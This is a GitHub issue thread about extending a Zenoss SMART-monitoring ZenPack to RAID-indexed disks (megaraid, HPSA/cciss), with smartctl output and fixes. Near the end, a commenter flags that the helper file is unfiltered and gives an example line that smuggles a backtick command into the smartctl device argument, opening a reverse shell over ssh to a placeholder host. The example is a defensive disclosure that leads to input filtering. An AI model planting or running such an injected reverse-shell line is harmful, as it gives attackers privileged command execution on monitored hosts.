daviswr / ZenPacks.daviswr.SMART

Storage device health monitoring for Zenoss
MIT License
0 stars 0 forks source link

Support indexed devices behind RAID controller #4

Closed daviswr closed 1 year ago

daviswr commented 2 years ago

Need to model driver & index from smartctl --scan so that the --device parameter can be passed during performance stat collection.

/dev/bus/0 -d megaraid,8 for example

May need new system for component ID, and don't really want to use serial number.

sempervictus commented 2 years ago

I've seen HPSA's requiring weirdness like smartctl -d /dev/sda -d cciss,1 to query sda but then querying sdb can still work by accessing sda using smartctl -d /dev/sda -d cciss,1 or the like. This would be a grand feature for the pack as those things, their Dell counterparts, and other rebranded LSI & friends' kit using silly distributor firmware are all too common.

sempervictus commented 2 years ago

At the current revision, i'm seeing the only SATA-attached SSD on an HP host but not any of the HPSA attached devices: image

daviswr commented 2 years ago

Were they showing up before?

Can you post the smartctl --scan output from that host?

sempervictus commented 2 years ago

This is now working, at least for megaraid. Checking HPSAs shortly (all of the ones i have right now are in HBA mode instead of LUN-per-disk like the older stuff).

sempervictus commented 2 years ago

HPSA isnt so great. You can get to it via:

smartctl -iAH /dev/sda -d cciss,1
smartctl 7.2 2020-12-30 r5155 [x86_64-linux-5.10.75] (local build)
Copyright (C) 2002-20, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Family:     Western Digital Red
Device Model:     WDC WD30EFRX-68EUZN0
Serial Number:    WD-WCC4NXXXXXXX
LU WWN Device Id: 5 0014ee 20d1a13eb
Firmware Version: 82.00A82
User Capacity:    3,000,592,982,016 bytes [3.00 TB]
Sector Sizes:     512 bytes logical, 4096 bytes physical
Rotation Rate:    5400 rpm
Device is:        In smartctl database [for details use: -P show]
ATA Version is:   ACS-2 (minor revision not indicated)
SATA Version is:  SATA 3.0, 6.0 Gb/s (current: 6.0 Gb/s)
Local Time is:    Mon Nov 15 00:44:53 2021 UTC
SMART support is: Available - device has SMART capability.
SMART support is: Enabled

=== START OF READ SMART DATA SECTION ===
SMART Status not supported: Incomplete response, ATA output registers missing
SMART overall-health self-assessment test result: PASSED
Warning: This result is based on an Attribute check.

SMART Attributes Data Structure revision number: 16
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  1 Raw_Read_Error_Rate     0x002f   200   200   051    Pre-fail  Always       -       0
  3 Spin_Up_Time            0x0027   182   182   021    Pre-fail  Always       -       5883
  4 Start_Stop_Count        0x0032   100   100   000    Old_age   Always       -       52
  5 Reallocated_Sector_Ct   0x0033   200   200   140    Pre-fail  Always       -       0
  7 Seek_Error_Rate         0x002e   200   200   000    Old_age   Always       -       0
  9 Power_On_Hours          0x0032   068   068   000    Old_age   Always       -       23724
 10 Spin_Retry_Count        0x0032   100   253   000    Old_age   Always       -       0
 11 Calibration_Retry_Count 0x0032   100   253   000    Old_age   Always       -       0
 12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       52
192 Power-Off_Retract_Count 0x0032   200   200   000    Old_age   Always       -       46
193 Load_Cycle_Count        0x0032   191   191   000    Old_age   Always       -       29382
194 Temperature_Celsius     0x0022   113   102   000    Old_age   Always       -       37
196 Reallocated_Event_Count 0x0032   200   200   000    Old_age   Always       -       0
197 Current_Pending_Sector  0x0032   200   200   000    Old_age   Always       -       0
198 Offline_Uncorrectable   0x0030   100   253   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x0032   200   200   000    Old_age   Always       -       0
200 Multi_Zone_Error_Rate   0x0008   100   253   000    Old_age   Offline      -       0

there's no /dev/bus/0 and --scan only shows sdg which is SATA-conncted :(. Fun story with these is that /dev/sda -d cciss,1 and 2 and 3 and so on give you different disks so the interface is /dev/sda but the number at the end is the drive being interrogated.

sempervictus commented 2 years ago

Dell uses megaraid i guess, so that works (older r410s tested)

daviswr commented 2 years ago

If --scan doesn't show them, I'm a little unsure how to discover them. What would you think of a text file in the home dir of the Zenoss utility account on the target host with things like "/dev/sda -d cciss,1" for manual entries to model?

sempervictus commented 2 years ago

The text file idea is neat, but you might run into nonsense with how the new dockerized zenoss handles state. It also decapsulates the intrinsic data storage paradigm of the stack as IIRC only the Zenoss application uses local files (configs) whereas the application logic itself uses the DB. Need to ponder on this one, kind of a pickle - lots of HPSAs out there.

daviswr commented 2 years ago

I meant a file on the remote host, to be read after the smartctl scan. Not suggesting we start modify the Zenoss collection container images :)

daviswr commented 2 years ago

382fa8d25b7da012e7beb1c74feca69fae180e35 will look for a zenoss_smart.txt file in the home directory of whatever account Zenoss is using to SSH on the target machine.

For example:

/dev/sda -d cciss,1
/dev/sda -d cciss,2
/dev/sda -d cciss,3

and the modeler should pick it up

sempervictus commented 2 years ago

Thank you sir - using i=0; for e in a b c d e f; do echo "sd$e -d cciss,$i"; i=$((i+1)); done > ~/zenoss_smart.txt on the target host to test.

sempervictus commented 2 years ago

So @ 5b14dfc848d, with that file created, i am unfortunately not seeing drives appear in the SMART component after a full Zenoss restart post-update. It does still pick up the one device that is SATA-connected and not on the HPSA (nor in the ~/zenoss_smart.txt file) in case that matters.

sempervictus commented 2 years ago

Ah! i see what i did wrong there - needed to be i=0; for e in a b c d e f; do echo "/dev/sd$e -d cciss,$i"; i=$((i+1)); done > zenoss_smart.txt ... it can't presume /dev/ as the path so needs a full path from root mount. Works as described - thank you.

sempervictus commented 2 years ago

Small presentation nit: SATA device names appear as the name, CCISS device names appear as the path: image I think the path should go in the name section sans the -d ... bit since that can be seen in the details while the device col should probably match the SATA version's output.

daviswr commented 2 years ago

Excellent. I'll update the Readme shortly.

As for the columns, could you make a table showing what you have in mind? I want to make sure I'm following you correctly.

For consistency's sake, how are thinking these cases should look?

Thanks!

sempervictus commented 2 years ago

Sorry, didn't mean to confuse the issue: the screenshot above includes a SATA disk at the bottom and CCISS disks at the top. The suggestion was to have the top disks look like the bottom one in the generic view, at least such that the device column is .split('/')[-1]

daviswr commented 2 years ago

No problem! fc8dfe2e0553002c49f2ea5b8872acdd01295ea6

sempervictus commented 2 years ago

Just a heads up - Zenoss 6 doesn't seem to need this, but v4 does apparently require we remove and replace the zenpack at this point. It might be the older construction kit though:

[zenoss@zen01 ZenPacks.daviswr.SMART]$ fil /var/spool/mail/zenoss 
-bash: fil: command not found
[zenoss@zen01 ZenPacks.daviswr.SMART]$ file /var/spool/mail/zenoss 
/var/spool/mail/zenoss: ASCII mail text, with very long lines
[zenoss@zen01 ZenPacks.daviswr.SMART]$ tail /var/spool/mail/zenoss 
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
    from Products.ZenModel.migrate.Migrate import Version
  File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
    __import__(module[:-3], locals(), globals())
  File "/opt/zenoss/Products/ZenModel/migrate/fixEmailNotificationClearSubjectFormat.py", line 18, in <module>
    from Products.ZenModel.migrate import Migrate
ImportError: cannot import name Migrate
...
sempervictus commented 2 years ago

This might be a bit more messy than expected. Looks like on zenoss4 there's some constructionkit issue:

ERROR:zen.ZenossStartup:Error encountered while processing ZenPacks.community.ConstructionKit
Traceback (most recent call last):
  File "/opt/zenoss/Products/ZenossStartup/__init__.py", line 27, in <module>
    pkg_path = zpkg.load().__path__[0]
  File "/opt/zenoss/lib/python/pkg_resources.py", line 1954, in load
    entry = __import__(self.module_name, globals(),globals(), ['__name__'])
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/__init__.py", line 3, in <module>
    from ZenPacks.community.ConstructionKit.Construct import *
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/Construct.py", line 7, in <module>
    from ZenPacks.community.ConstructionKit.BasicDefinition import *
  File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
    from Products.ZenModel.migrate.Migrate import Version
  File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
    __import__(module[:-3], locals(), globals())
  File "/opt/zenoss/Products/ZenModel/migrate/standalone_datapoint_rename.py", line 19, in <module>
    os.rename(fullpath, os.path.join(d, '%s_%s.rrd' % (base, base)))
OSError: [Errno 2] No such file or directory

... and that's just the --remove call. Might be in for some pain here.

daviswr commented 2 years ago

None of my packs use ConstructionKit, they're all built on ZenPackLib.

sempervictus commented 2 years ago

Ha, well, this instance is ~5yo and has ~100 packs in it. Its all on ZFS anyway and i take zenbatchdumps so i can restore snaps or the whole thing. Its slated for replacement in Q1 anyway with a v6 somewhere up in Bezos' stack. Unwinding zope-isms is bad enough, not sure how far down this specific rabbit hole i want to fall in terms of RCA if i can recover state (though the quality of said state is definitely in question now).

daviswr commented 2 years ago

Just in case it's causing a problem, though, add this back to the yaml after classes->SmartStorage->properties->SmartSupport

      # smartctl --get=all
      AamFeature:
        label: Automatic Acoustic Management
        short_label: AAM
        default: Unavailable
        details_display: false
        order: 29
      ApmFeature:
        label: Advanced Power Management
        short_label: AAM
        default: Unavailable
        details_display: false
        order: 30
      RdLookAhead:
        label: Read Look-Ahead
        default: Unavailable
        details_display: false
        order: 31
      WriteCache:
        label: Write Cache
        default: Unavailable
        details_display: false
        order: 32
      AtaSecurity:
        label: ATA Security
        short_label: Security
        default: Unavailable
        details_display: false
        order: 33

Though I've never had a problem removing a pack when the yaml lacked attributes it was installed with, aside from leaving shit on objects that doesn't need to be there. Renaming attributes, though, is a whole other can of worms.

sempervictus commented 2 years ago

Renaming has bitten me so many times that i'm pretty sure i produce anti-venom at this point - been using Zenoss for >10y. :) Its why we have SOP for cron jobs to do zen dumps - external state in a flat file is safer than the catacombs of Arkham asylum otherwise known as zodb/zope. This seems to be working properly now - still seeing the -d cciss,X suffix in the name column, but functionally works just as advertised. Would be remiss if i didn't ask - does the zenpack filter what's in these files in any way (drop |, &&, backticks, and so on)? I could see something like dirtycow happening years down the line permitting people to execute privileged commands by overwriting this file - its niche, but might hurt given the privs required to run smartctl and how few people use granular sudo configs (or straight-up root login for privileged functions). EDIT - as an example, content such as this could create "a problem":

/dev/sda -d `mkfifo /tmp/kwpsul;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 255.255.255.255 0</tmp/kwpsul|/bin/sh >/tmp/kwpsul 2>&1;rm /tmp/kwpsul`

which has a lot of special characters and fun "filterables" but is just one of many publicly available similar payloads (well, in this case its a generator i wrote into MSF).

daviswr commented 2 years ago

I can drop the -d param from the title if it also contains cciss. Right now only "auto" is dropped and all indexed ones have the full name.

As for filtering file contents: right now, no, but I think a quick grep -vwith some common characters that likely won't ever be in a smartctl device name should provide some measure. I'll open an issue to track that.

daviswr commented 2 years ago

ddc9b1eb6e4bee9e73e2a3d8cf527a25fcae028e - "-d cciss,X" omitted from component title 36ad2015b131aa2795ba0c6d45ea01fd7248149b - Filter lines from model helper file with invalid content